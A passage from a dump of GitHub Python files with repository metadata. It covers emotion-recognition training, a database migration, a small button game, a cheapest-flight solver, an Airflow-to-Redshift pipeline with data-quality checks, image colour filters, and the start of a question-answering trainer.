prediction_labels.append(emotions.index(emotion))\n\n return training_data, training_labels, prediction_data, prediction_labels \n\naccur_lin = [] # 10 random set generation\nfor i in range(0,10):\n print(\"Making sets %s\" %i) #Make sets by random sampling 80/20%\n training_data, training_labels, prediction_data, prediction_labels = make_sets()\n\n npar_train = np.array(training_data) # numpy array\n npar_trainlabs = np.array(training_labels)\n \n print(\"training model %s\" %i) #train model\n clf.fit(npar_train, training_labels)\n\n print(\"getting accuracies %s\" %i)\n npar_pred = np.array(prediction_data)\n pred_lin = clf.score(npar_pred, prediction_labels)\n print (\"Model: \", pred_lin)\n accur_lin.append(pred_lin) #Store accuracy in a list\n\nprint(\"Mean value accuracy in Model: %.3f\" %np.mean(accur_lin)) \n","repo_name":"vishalsingh020997/Emotion-Recognition-using-Facial-Landmarks","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"47"} +{"seq_id":"13638317229","text":"\"\"\"listing_tag_assoc many to many table created\n\nRevision ID: c6d6defde195\nRevises: dfcf20622785\nCreate Date: 2019-11-25 20:07:46.661788\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c6d6defde195'\ndown_revision = 'dfcf20622785'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('listing_tag_assoc',\n sa.Column('listing_id', sa.Integer(), nullable=True),\n sa.Column('tag_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['listing_id'], ['listing.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['listing_tag.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('listing_tag_assoc')\n # ### end Alembic commands ###\n","repo_name":"SammyPulos/CollaborationNow","sub_path":"migrations/versions/c6d6defde195_listing_tag_assoc_many_to_many_table_.py","file_name":"c6d6defde195_listing_tag_assoc_many_to_many_table_.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31741393296","text":"from sensobox.button import a_instance as left_btn, b_instance as right_btn\nfrom sensobox.display import instance as display\nfrom time import sleep_ms\n\nimport random\n\nvalues = []\ndisplay_left = \"****\"\ndisplay_right = \"vvvv\"\nleft = True\nright = False\n\nfor i in range(4):\n values.append(random.getrandbits(1))\n \nfor b in values:\n display.show(display_left if b else display_right)\n sleep_ms(400)\n display.show(\" \")\n sleep_ms(400)\n@left_btn.on_press\ndef a():\n check(left)\n \n@right_btn.on_press\ndef b():\n check(right)\n \ndef check(side):\n display.show(display_left if side else display_right)\n sleep_ms(100)\n display.show(\" \")\n v = values.pop(0)\n if v != side:\n wrong()\n elif len(values) == 0:\n win()\n \ndef win():\n for _ in range(3):\n display.show(\"nice\")\n sleep_ms(300)\n display.show(\" \")\n sleep_ms(300)\n \ndef wrong():\n for _ in range(3):\n display.show(\"----\")\n sleep_ms(300)\n display.show(\" \")\n sleep_ms(300)\n","repo_name":"octopusengine/octopuslab","sub_path":"projects/sensobox/projects/p09_memory_game/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"47"} +{"seq_id":"74567462862","text":"class Graph:\n def __init__(self):\n self._graph = collections.defaultdict(list)\n\n def add_edge(self, from_, to, price):\n self._graph[from_].append((to, price))\n\n def dijkstra(self, src, dst, K):\n costs = collections.defaultdict(lambda: float('inf'))\n current_stops = collections.defaultdict(lambda: float('inf'))\n costs[src], current_stops[src] = 0, 0\n\n heap = []\n heapq.heappush(heap, (src, 0, 0))\n\n while len(heap) != 0:\n current, price_so_far, stops = heapq.heappop(heap)\n if stops == K + 1:\n continue\n\n for to, price in self._graph[current]:\n if price+price_so_far < costs[to]:\n costs[to] = price+price_so_far\n heapq.heappush(heap, (to, price+price_so_far, stops+1))\n elif stops < current_stops[to]:\n current_stops[to] = stops\n heapq.heappush(heap, (to, price+price_so_far, stops+1))\n\n return -1 if costs[dst] == float(\"inf\") else costs[dst]\n\n\n# def bfs(self, src, dst, K):\n# # runs infinitely if graph is cyclic\n# min_price = float('inf')\n# queue = collections.deque()\n# queue.appendleft((src, 0, 0))\n#\n# while len(queue) != 0:\n# current, price_so_far, stops = queue.pop()\n# if stops == K + 2:\n# continue\n#\n# if current == dst:\n# min_price = min(min_price, price_so_far)\n#\n# for to, price in self._graph[current]:\n# queue.appendleft((to, price + price_so_far, stops+1))\n#\n# return min_price if min_price != float('inf') else -1\n\n\nclass Solution:\n def findCheapestPrice(self, n: int, flights: List[List[int]], src: int, dst: int, K: int) -> int:\n graph = Graph()\n for from_, to, price in flights:\n graph.add_edge(from_, to, price)\n\n return graph.dijkstra(src, dst, K)\n","repo_name":"azimjohn/leetcode","sub_path":"june_challenge/14_cheapest_flight_within_k_stops.py","file_name":"14_cheapest_flight_within_k_stops.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"47"} +{"seq_id":"39012987848","text":"\"\"\"\nHomework task for Vinted Data Engineering Academy\nExample use of the implemented MapReduce framework\nAuthor: Titas Janusonis\n\"\"\"\nimport pandas as pd\n\nfrom MapReduce import MapReduce\n\n# task #1\n\nMapReduce(\n maper={\n \"data/clicks\": lambda click: (click[\"date\"], click[\"date\"])\n },\n reducer=lambda kv: [{\"date\": kv[0], \"count\": kv[1].count(kv[0])}]\n ,\n output=\"data/clicks_per_day\"\n)\n\n# task #2\n\ndef user_map(user: pd.Series) -> tuple[int, pd.Series]:\n if user[\"country\"] == \"LT\":\n return (user[\"id\"], user.copy())\n\ndef country_reducer(kv: tuple[int, list]) -> list[dict]:\n index_list = kv[1][0].index.tolist()\n data_entries = kv[1]\n # only need entries with clicks and country info\n if index_list.count('country') > 0 and len(data_entries) > 1:\n df = pd.concat(data_entries[1:])\n df = df.groupby(level=0).agg(list).apply(pd.Series).T\n df[index_list] = data_entries[0]\n\n return df.to_dict(orient=\"records\")\n\n\nMapReduce(\n maper={\n \"data/users\": user_map,\n \"data/clicks\": lambda click: (click[\"user_id\"], click.copy())\n },\n reducer=country_reducer, \n output=\"data/filtered_clicks\"\n)\n","repo_name":"SyroQT/vinted-hm","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74053102223","text":"from django.db import models\nfrom django.db.models.signals import pre_save\nimport uuid\n# Create your models here.\nclass Client(models.Model):\n name=models.CharField(max_length=120,null=False,blank=False)\n token=models.UUIDField(default=uuid.uuid4,editable=False,null=False,blank=False)\n \n def __str__(self):\n return self.name\n \n class ReadonlyMeta:\n readonly = [\"token\"]","repo_name":"asutosh05/xrp-multisig-wallet","sub_path":"clients/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"32189318501","text":"# AOC 2021 Day 6\n# Chris O\n#\n# Goal determine amount of fish left after 80 days\n# fish timer reach 0 and change to 6 reproduce\n# new fish doesn't count down day born but starts next journey at 8 instead\n\n# example\n\n# Initial state: 3,4,3,1,2\n# After 1 day: 2,3,2,0,1\n# After 2 days: 1,2,1,6,0,8\n# After 3 days: 0,1,0,5,6,7,8\n# After 4 days: 6,0,6,4,5,6,7,8,8\n# After 5 days: 5,6,5,3,4,5,6,7,7,8\n# After 6 days: 4,5,4,2,3,4,5,6,6,7\n# After 7 days: 3,4,3,1,2,3,4,5,5,6\n# After 8 days: 2,3,2,0,1,2,3,4,4,5\n# After 9 days: 1,2,1,6,0,1,2,3,3,4,8\n# After 10 days: 0,1,0,5,6,0,1,2,2,3,7,8\n# After 11 days: 6,0,6,4,5,6,0,1,1,2,6,7,8,8,8\n# After 12 days: 5,6,5,3,4,5,6,0,0,1,5,6,7,7,7,8,8\n# After 13 days: 4,5,4,2,3,4,5,6,6,0,4,5,6,6,6,7,7,8,8\n# After 14 days: 3,4,3,1,2,3,4,5,5,6,3,4,5,5,5,6,6,7,7,8\n# After 15 days: 2,3,2,0,1,2,3,4,4,5,2,3,4,4,4,5,5,6,6,7\n# After 16 days: 1,2,1,6,0,1,2,3,3,4,1,2,3,3,3,4,4,5,5,6,8\n# After 17 days: 0,1,0,5,6,0,1,2,2,3,0,1,2,2,2,3,3,4,4,5,7,8\n# After 18 days: 6,0,6,4,5,6,0,1,1,2,6,0,1,1,1,2,2,3,3,4,6,7,8,8,8,8\n\nimport matplotlib.pyplot as plt\nimport re\nimport numpy as np\nimport math\n#filename = 'day6_inputsample.txt'\nfilename = 'day6_input.txt'\ndatin = open(filename)\ndatinss = datin.read()\ndatin.close()\n\nblahdata = datinss.split(',')\ndata = [None]*len(blahdata)\ndata2 = [None]*len(blahdata)\nfor x in range(len(blahdata)):\n data[x] = int(blahdata[x])\n data2[x] = int(blahdata[x])\n\ndef fishloop(flist):\n tmp = []\n for e in flist:\n if e == 0:\n tmp.append(6)\n tmp.append(8)\n else:\n tmp.append(e-1)\n return tmp\n \n# run loop to iterate 80 days\nfor i in range(80):\n data = fishloop(data)\n \nnumfish = len(data)\nprint('Part 1, after 80 days there are ',numfish,' fish')\n\n#Part 2\n# New approach, I shoud put the amount of fish per category of days (0,1,2,3,4,5,6,7,8)\n# and having the list slowly move to the left with the leftmost one creating new fish \n# at day 8 and moving them to day 6\n# be careful not to not to move day 8 fish on first day\n\ndays = 256\n\n# number of fish per day\nfishgroup = [0]*9\n\nfor j in data2:\n fishgroup[j] +=1\n \nfor k in range(days):\n temp = fishgroup.pop(0)\n fishgroup[6] += temp\n fishgroup.append(temp)\n \nprint(\"Part 2, after 256 days there are \",sum(fishgroup),\" fish\")\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"doparko/advent_of_code","sub_path":"aoc2021/day6_code.py","file_name":"day6_code.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9769325200","text":"a = input()\r\nb = input()\r\nc = input()\r\nd = input()\r\ne = input()\r\nf = input()\r\ng = input()\r\nh = input()\r\ni = input()\r\nj = input()\r\n\r\nprint(int(a) + int(b) + int(c) + int(d) + int(e) + int(f) + int(g) + int(h) + int(i) + int(j))\r\n","repo_name":"Nico0106/CA116","sub_path":"labsheet-1b/add-ten-numbers.py","file_name":"add-ten-numbers.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"ceb","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12928542044","text":"from load_image import ft_load\nimport cv2 as cv\nimport numpy as np\n\n\ndef ft_invert(array: np.ndarray) -> np.ndarray:\n '''Inverts the color of the image received.'''\n try:\n assert isinstance(array, np.ndarray)\n invert = array.copy()\n lrow, lcol, _ = invert.shape\n for x in range(lrow):\n for y in range(lcol):\n invert[x][y][0] = 255 - invert[x][y][0]\n invert[x][y][1] = 255 - invert[x][y][1]\n invert[x][y][2] = 255 - invert[x][y][2]\n cv.imshow(\"invertLandscape.jpg\", invert)\n cv.waitKey(0)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(don't existe, not a jpg or jpeg\")\n\n\ndef ft_red(array: np.ndarray) -> np.ndarray:\n '''Changes the image received to red.'''\n try:\n assert isinstance(array, np.ndarray)\n red = array.copy()\n lrow, lcol, _ = red.shape\n for x in range(lrow):\n for y in range(lcol):\n red[x][y][0] = 0\n red[x][y][1] = 0\n cv.imshow(\"redLandscape.jpg\", red)\n cv.waitKey(0)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(don't existe, not a jpg or jpeg\")\n\n\ndef ft_green(array: np.ndarray) -> np.ndarray:\n '''Changes the image received to green.'''\n try:\n assert isinstance(array, np.ndarray)\n green = array.copy()\n lrow, lcol, _ = green.shape\n for x in range(lrow):\n for y in range(lcol):\n green[x][y][0] = 0\n green[x][y][2] = 0\n cv.imshow(\"greenLandscape.jpg\", green)\n cv.waitKey(0)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(don't existe, not a jpg or jpeg\")\n\n\ndef ft_blue(array: np.ndarray) -> np.ndarray:\n '''Changes the image received to blue.'''\n try:\n assert isinstance(array, np.ndarray)\n blue = array.copy()\n lrow, lcol, _ = blue.shape\n for x in range(lrow):\n for y in range(lcol):\n blue[x][y][1] = 0\n blue[x][y][2] = 0\n cv.imshow(\"blueLandscape.jpg\", blue)\n cv.waitKey(0)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(don't existe, not a jpg or jpeg\")\n\n\ndef ft_grey(array: np.ndarray) -> np.ndarray:\n '''Changes the image received to grey.'''\n try:\n assert isinstance(array, np.ndarray)\n grey = array.copy()\n lrow, lcol, _ = grey.shape\n for x in range(lrow):\n for y in range(lcol):\n grey[x][y][0] = grey[x][y][1]\n grey[x][y][2] = grey[x][y][1]\n cv.imshow(\"greyLandscape.jpg\", grey)\n cv.waitKey(0)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(don't existe, not a jpg or jpeg\")\n\n\ndef main():\n '''Make some tests'''\n try:\n array = ft_load(\"../images/landscape.jpg\")\n assert isinstance(array, np.ndarray)\n cv.imshow(\"landscape.jpg\", array)\n cv.waitKey(0)\n ft_invert(array)\n ft_red(array)\n ft_green(array)\n ft_blue(array)\n ft_grey(array)\n print(ft_invert.__doc__)\n print(ft_red.__doc__)\n print(ft_green.__doc__)\n print(ft_blue.__doc__)\n print(ft_grey.__doc__)\n except AssertionError:\n print(\"AssertionError: error with the image \\\n(don't existe, not a jpg or jpeg\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gmorange42/Python-for-Data-Science","sub_path":"Array/ex05/pimp_image.py","file_name":"pimp_image.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27677300864","text":"from datetime import datetime, timedelta\nimport os\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators import (StageToRedshiftOperator, LoadFactOperator,\n LoadDimensionOperator, DataQualityOperator)\nfrom helpers import SqlQueries\n\ns3_key_song_data = 'song_data'\ns3_key_log_data = 'log_data/{execution_date.year}/{execution_date.month}'\nretry_delay = timedelta(minutes=5)\n\ndefault_args = {\n 'owner': 'udacity',\n 'depends_on_past': False,\n 'start_date': datetime(2018, 11, 30, 23, 0, 0),\n 'end_date': datetime(2018, 11, 30, 23, 0, 0),\n 'retries': 3,\n 'retry_delay': retry_delay,\n 'email_on_retry': False,\n 'catchup': False\n}\n\ndag = DAG('songplaysdwh_dag',\n default_args=default_args,\n description='Load and transform data in Redshift with Airflow',\n schedule_interval=timedelta(hours=1)\n )\n\nstart_operator = DummyOperator(task_id='Begin_execution', dag=dag)\n\nstage_events_to_redshift = StageToRedshiftOperator(\n task_id='Stage_events',\n dag=dag,\n redshift_conn_id='redshift',\n aws_credentials_id='aws_credentials',\n table='staging_events',\n s3_bucket='udacity-dend',\n s3_key=s3_key_log_data,\n region='us-west-2',\n data_format = 'json',\n data_format_args = \"'s3://udacity-dend/log_json_path.json'\",\n data_format_kwargs = None,\n file_compression = '',\n data_conversion_args = None,\n data_conversion_kwargs = None,\n data_load_args = None,\n data_load_kwargs = {'STATUPDATE':'OFF'},\n del_existing = True\n)\n\nstage_songs_to_redshift = StageToRedshiftOperator(\n task_id='Stage_songs',\n dag=dag,\n redshift_conn_id='redshift',\n aws_credentials_id='aws_credentials',\n table='staging_songs',\n s3_bucket='udacity-dend',\n s3_key=s3_key_song_data,\n region='us-west-2',\n data_format = 'json',\n data_format_args = \"'auto'\",\n data_format_kwargs = None,\n file_compression = '',\n data_conversion_args = None,\n data_conversion_kwargs = None,\n data_load_args = None,\n data_load_kwargs = {'STATUPDATE':'OFF'},\n del_existing = True\n)\n\nload_songplays_table = LoadFactOperator(\n task_id='Load_songplays_fact_table',\n dag=dag,\n redshift_conn_id='redshift',\n dest_table='songplays',\n select_sql=SqlQueries.songplay_table_insert\n)\n\nload_user_dimension_table = LoadDimensionOperator(\n task_id='Load_user_dim_table',\n dag=dag,\n redshift_conn_id='redshift',\n dest_table='users',\n select_sql=SqlQueries.user_table_insert,\n append=False\n)\n\nload_song_dimension_table = LoadDimensionOperator(\n task_id='Load_song_dim_table',\n dag=dag,\n redshift_conn_id='redshift',\n dest_table='songs',\n select_sql=SqlQueries.song_table_insert,\n append=False\n)\n\nload_artist_dimension_table = LoadDimensionOperator(\n task_id='Load_artist_dim_table',\n dag=dag,\n redshift_conn_id='redshift',\n dest_table='artists',\n select_sql=SqlQueries.artist_table_insert,\n append=False\n)\n\nload_time_dimension_table = LoadDimensionOperator(\n task_id='Load_time_dim_table',\n dag=dag,\n redshift_conn_id='redshift',\n dest_table='time',\n select_sql=SqlQueries.time_table_insert,\n append=False\n)\n\n# Assertion function returns True when conditions met\ndef count_gt_zero(records):\n if len(records) < 1 or len(records[0]) < 1:\n return False\n num_records = records[0][0]\n if num_records < 1:\n return False\n return True\n\n# Assertion function returns True when conditions met\ndef count_eq_zero(records):\n if len(records) > 0 and len(records[0]) > 0:\n num_records = records[0][0]\n if num_records > 0:\n return False\n return True\n\n# Return test dict to enable testing for existence of data by DataQualityOperator\ndef get_data_exists_test(table=''):\n return {'sql': \"SELECT COUNT(*) FROM {}\".format(table),\n 'assertion': count_gt_zero,\n 'error_message': \"Data quality check failed. {} contained 0 rows\".format(table),\n 'log_message':('Data quality check for data on table {} passed with > 0 records'\n .format(table))}\n\n# Return test dict to enable testing of primary key for uniqueness by DataQualityOperator\ndef get_primary_key_test(table='', primary_key=''):\n return {'sql': \"\"\"SELECT COUNT(*) FROM\n (SELECT COUNT({}) AS pkey_count\n FROM {}\n GROUP BY {}\n HAVING pkey_count > 1) dup_pkeys\n \"\"\".format(primary_key, table, primary_key),\n 'assertion': count_eq_zero,\n 'error_message': (\"Data quality check failed. {} has duplicates in {} column\"\n .format(table, primary_key)),\n 'log_message':(\"Data quality check for primary_key {} \".format(primary_key) +\n \"on table {} passed with no duplicates\".format(table))}\n\n# Return test dict to enable checking that there are no nulls for a column by DataQualityOperator\ndef get_not_nulls_test(table='', field=''):\n return {'sql': \"SELECT count(*) FROM {} WHERE {} is NULL\".format(table, field),\n 'assertion': count_eq_zero,\n 'error_message': (\"Data quality check failed. {} contains null(s) in col {}\"\n .format(table, field)),\n 'log_message':(\"Data quality check passed. Zero nulls in col {} on table {}\"\n .format(field, table))}\n\n# songplays tests\ndata_exists_test = get_data_exists_test(table='songplays')\nprimary_key_test = get_primary_key_test(table='songplays', primary_key='playid')\nnot_null_start_time_test = get_not_nulls_test(table='songplays', field='start_time')\nnot_null_userid_test = get_not_nulls_test(table='songplays', field='userid')\nall_tests = [data_exists_test,\n primary_key_test,\n not_null_start_time_test,\n not_null_userid_test]\n\nrun_songplay_quality_checks = DataQualityOperator(\n task_id='Run_songplay_data_quality_checks',\n dag=dag,\n redshift_conn_id='redshift',\n tests=all_tests\n)\n\n# user tests\ndata_exists_test = get_data_exists_test(table='users')\nprimary_key_test = get_primary_key_test(table='users', primary_key='userid')\nall_tests = [data_exists_test,\n primary_key_test]\n\nrun_user_quality_checks = DataQualityOperator(\n task_id='Run_user_data_quality_checks',\n dag=dag,\n redshift_conn_id='redshift',\n tests=all_tests\n)\n\n# song tests\ndata_exists_test = get_data_exists_test(table='songs')\nprimary_key_test = get_primary_key_test(table='songs', primary_key='songid')\nnot_null_test = get_not_nulls_test(table='songs', field='title')\nall_tests = [data_exists_test,\n primary_key_test,\n not_null_test]\n\nrun_song_quality_checks = DataQualityOperator(\n task_id='Run_song_data_quality_checks',\n dag=dag,\n redshift_conn_id='redshift',\n tests=all_tests\n)\n\n# artist tests\ndata_exists_test = get_data_exists_test(table='artists')\nnot_null_test = get_not_nulls_test(table='artists', field='artistid')\nall_tests = [data_exists_test,\n not_null_test]\n\nrun_artist_quality_checks = DataQualityOperator(\n task_id='Run_artist_data_quality_checks',\n dag=dag,\n redshift_conn_id='redshift',\n tests=all_tests\n)\n\n# time tests\ndata_exists_test = get_data_exists_test(table='time')\nprimary_key_test = get_primary_key_test(table='time', primary_key='start_time')\nall_tests = [data_exists_test,\n primary_key_test]\n\nrun_time_quality_checks = DataQualityOperator(\n task_id='Run_time_data_quality_checks',\n dag=dag,\n redshift_conn_id='redshift',\n tests=all_tests\n)\n\n\nend_operator = DummyOperator(task_id='Stop_execution', dag=dag)\n\nstart_operator >> stage_events_to_redshift\nstart_operator >> stage_songs_to_redshift\nstage_events_to_redshift >> load_songplays_table\nstage_songs_to_redshift >> load_songplays_table\nload_songplays_table >> run_songplay_quality_checks\nrun_songplay_quality_checks >> load_user_dimension_table\nrun_songplay_quality_checks >> load_song_dimension_table\nrun_songplay_quality_checks >> load_artist_dimension_table\nrun_songplay_quality_checks >> load_time_dimension_table\nload_user_dimension_table >> run_user_quality_checks\nload_song_dimension_table >> run_song_quality_checks\nload_artist_dimension_table >> run_artist_quality_checks\nload_time_dimension_table >> run_time_quality_checks\nrun_user_quality_checks >> end_operator\nrun_song_quality_checks >> end_operator\nrun_artist_quality_checks >> end_operator\nrun_time_quality_checks >> end_operator\n","repo_name":"dysartcoal/ProjectDataPipeline","sub_path":"dags/songplaysdwh_dag.py","file_name":"songplaysdwh_dag.py","file_ext":"py","file_size_in_byte":8636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22132527687","text":"\"\"\"\n입력 예시 1\n2 20 50\n50 30\n20 40\n\n출력 예시 1\n\n입력 예시 2\n2 40 50\n50 30\n20 40\n\n출력 예시 2\n0\n\n입력 예시 3\n2 20 50\n50 30\n30 40\n\n출력 예시 3\n1\n\n입력 예시 4\n3 5 10\n10 15 20\n20 30 25\n40 22 10\n\n출력 예시 4\n2\n\n입력 예시 5\n4 10 50\n10 100 20 90\n80 100 60 70\n70 20 30 40\n50 20 100 10\n\n\n출력 예시 5\n3\n\n\"\"\"\n\n\nn, l, r = map(int, input().split())\n\ngraph = []\n\n\nfor _ in range(n):\n graph.append(list(map(int, input().split())))\n\ntemp = [[-1]*n for _ in range(n)]\ntemp[0][0] = 0\n\nprint(n, l, r)\nprint(graph)\n\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\ndef check(x, y):\n\n for i in range(n):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if nx >= 0 and nx < n and ny >= 0 and ny < n:\n # 여기서 확인 해야함, 국경선 열지\n value = abs(graph[x][y] - graph[nx][ny])\n if l <= value and value < r:\n\n # -1이면 내껄 주고, -1이 아니면 상대껄 가져오고,\n if temp[nx][ny] == -1:\n temp[nx][ny] = temp[x][y]\n else:\n temp[x][y] = temp[nx][ny]\n else:\n temp[nx][ny] = temp[x][y] + 1\n\n\n\n\nfor i in range(n):\n for j in range(n):\n check(i, j)\n\nprint(temp)","repo_name":"hanjungwoo1/CodingTest","sub_path":"이것이 취업을 위한 코딩 테스트다/Chapter 13/인구 이동_2.py","file_name":"인구 이동_2.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"8861283415","text":"from sklearn import linear_model\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.mlab as mlab\r\nimport numpy as np\r\nimport math\r\nfrom math import *\r\n\r\nmu = 0\r\nmu2 = 0.5\r\nmu3 = 0.75\r\n\r\nvariance = 0.5\r\nvariance2 = 1\r\nvariance3 = 1.5\r\n\r\nsigma = math.sqrt(variance)\r\nsigma2 = math.sqrt(variance2)\r\nsigma3 = math.sqrt(variance3)\r\n\r\nx = np.linspace(mu-3*variance,mu+3*variance, 40)\r\nx2 = np.linspace(mu2-3*variance2, mu+3*variance2, 40)\r\nx3 = np.linspace(mu2-3*variance3, mu+3*variance3, 40)\r\n\r\nA = np.zeros((559,1))\r\nA[20:60] = mlab.normpdf(x, mu, sigma).reshape(40,1)\r\nA[230:270] = mlab.normpdf(x2, mu2, sigma2).reshape(40,1)\r\nA[420:460] = mlab.normpdf(x3, mu3, sigma3).reshape(40,1)\r\nA = A.reshape(559)\r\n\r\nB = np.zeros((559,1))\r\nB[23:63] = mlab.normpdf(x, mu, sigma).reshape(40,1)\r\nB[400:440] = mlab.normpdf(x3, mu3, sigma3).reshape(40,1)\r\nB[470:510] = mlab.normpdf(x2, mu2, sigma2).reshape(40,1)\r\nB = B.reshape(559)\r\n\r\nC = np.zeros((559, 1))\r\nC[320:360] = mlab.normpdf(x2, mu2, sigma2).reshape(40,1)\r\nC[433:473] = mlab.normpdf(x, mu, sigma).reshape(40,1)\r\nC[128:168] = mlab.normpdf(x3, mu3, sigma3).reshape(40,1)\r\nC = C.reshape(559)\r\n\r\nspectralmatrix = np.zeros((256, 256, 559))\r\nfunctionalmatrix = np.zeros((256, 256))\r\nAmatrix = np.zeros((256, 256))\r\nBmatrix = np.zeros((256, 256))\r\nCmatrix =np.zeros((256, 256))\r\nxaxis = spectralmatrix.shape[0]\r\nyaxis = spectralmatrix.shape[1]\r\n\r\n\r\n#generating random coefficients\r\n#creating a matrix with a spectrum at each point\r\n\r\nnp.random.seed(122)\r\na=np.random.rand(1)\r\nb=np.random.rand(1)\r\nc=np.random.rand(1)\r\nspatialfrequency = (2*np.pi)/64\r\nfor x in range(xaxis):\r\n for y in range(yaxis):\r\n a = abs(np.sin(y*spatialfrequency))\r\n b = abs(np.sin(x*spatialfrequency) + np.sin(y*spatialfrequency))\r\n c = np.sin(x*spatialfrequency)**2\r\n #can make a, b, c as a function of x and y with some random noise\r\n spectralmatrix[x,y,:] = a*A + b*B + c*C\r\n functionalmatrix[x][y] = 2*a + b + 9*c\r\n Amatrix[x][y]=a\r\n Bmatrix[x][y]=b\r\n Cmatrix[x][y]=c\r\n\r\n#creating a linear relating between the three matrices\r\npts=256\r\na=Amatrix\r\nb=Bmatrix\r\nc=Cmatrix\r\nB0=0\r\nB1=2\r\nB2=1\r\nB3=9\r\nyactual=B0+B1*a+B2*b+B3*c\r\n\r\n# reshaping and concatenating the matrices for linear regression\r\na=a.reshape(65536,1)\r\nb=b.reshape(65536,1)\r\nc=c.reshape(65536,1)\r\nyactual=yactual.reshape(65536,1)\r\nx1=np.concatenate((a,b), axis=1)\r\nx=np.concatenate((x1,c), axis=1)\r\n\r\n#performing the linear regression\r\nregr=linear_model.LinearRegression()\r\ns=regr.fit(x, yactual)\r\ns.coef_[0], s.intercept_[0]\r\n","repo_name":"kongjy/hyperAFM","sub_path":"Jessica/linear regression on synthetic data.py","file_name":"linear regression on synthetic data.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21960381138","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@file : cmrc_trainer.py\n@author: zijun\n@contact : zijun_sun@shannonai.com\n@date : 2021/5/20 15:03\n@version: 1.0\n@desc : \n\"\"\"\nimport argparse\nimport collections\nimport json\nimport os\n\nimport pytorch_lightning as pl\nimport torch\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.callbacks.model_checkpoint import ModelCheckpoint\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom tokenizers import BertWordPieceTokenizer\nfrom torch.utils.data.dataloader import DataLoader\nfrom transformers import AdamW, BertConfig, get_linear_schedule_with_warmup\n\nfrom datasets.cmrc_2018_dataset import CMRC2018Dataset\nfrom models.modeling_glycebert import GlyceBertForQuestionAnswering\nfrom utils.random_seed import set_random_seed\n\nset_random_seed(2333)\nRawResult = collections.namedtuple(\"RawResult\",\n [\"unique_id\", \"start_logits\", \"end_logits\"])\n\n\nclass CMRCTask(pl.LightningModule):\n\n def __init__(\n self,\n args: argparse.Namespace\n ):\n \"\"\"Initialize a models, tokenizer and config.\"\"\"\n super().__init__()\n self.args = args\n if isinstance(args, argparse.Namespace):\n self.save_hyperparameters(args)\n self.bert_dir = args.bert_path\n self.bert_config = BertConfig.from_pretrained(self.bert_dir, output_hidden_states=False)\n self.model = GlyceBertForQuestionAnswering.from_pretrained(self.bert_dir)\n self.tokenizer = BertWordPieceTokenizer(os.path.join(self.args.bert_path, \"vocab.txt\"))\n\n gpus_string = self.args.gpus if not self.args.gpus.endswith(',') else self.args.gpus[:-1]\n self.num_gpus = len(gpus_string.split(\",\"))\n self.query_map = {}\n self.result = {}\n\n def configure_optimizers(self):\n \"\"\"Prepare optimizer and schedule (linear warmup and decay)\"\"\"\n model = self.model\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": self.args.weight_decay,\n },\n {\n \"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n ]\n optimizer = AdamW(optimizer_grouped_parameters,\n betas=(0.9, 0.98), # according to RoBERTa paper\n lr=self.args.lr,\n eps=self.args.adam_epsilon)\n t_total = len(self.train_dataloader()) // self.args.accumulate_grad_batches * self.args.max_epochs\n warmup_steps = int(self.args.warmup_proporation * t_total)\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps,\n num_training_steps=t_total)\n\n return [optimizer], [{\"scheduler\": scheduler, \"interval\": \"step\"}]\n\n def compute_loss_and_acc(self, 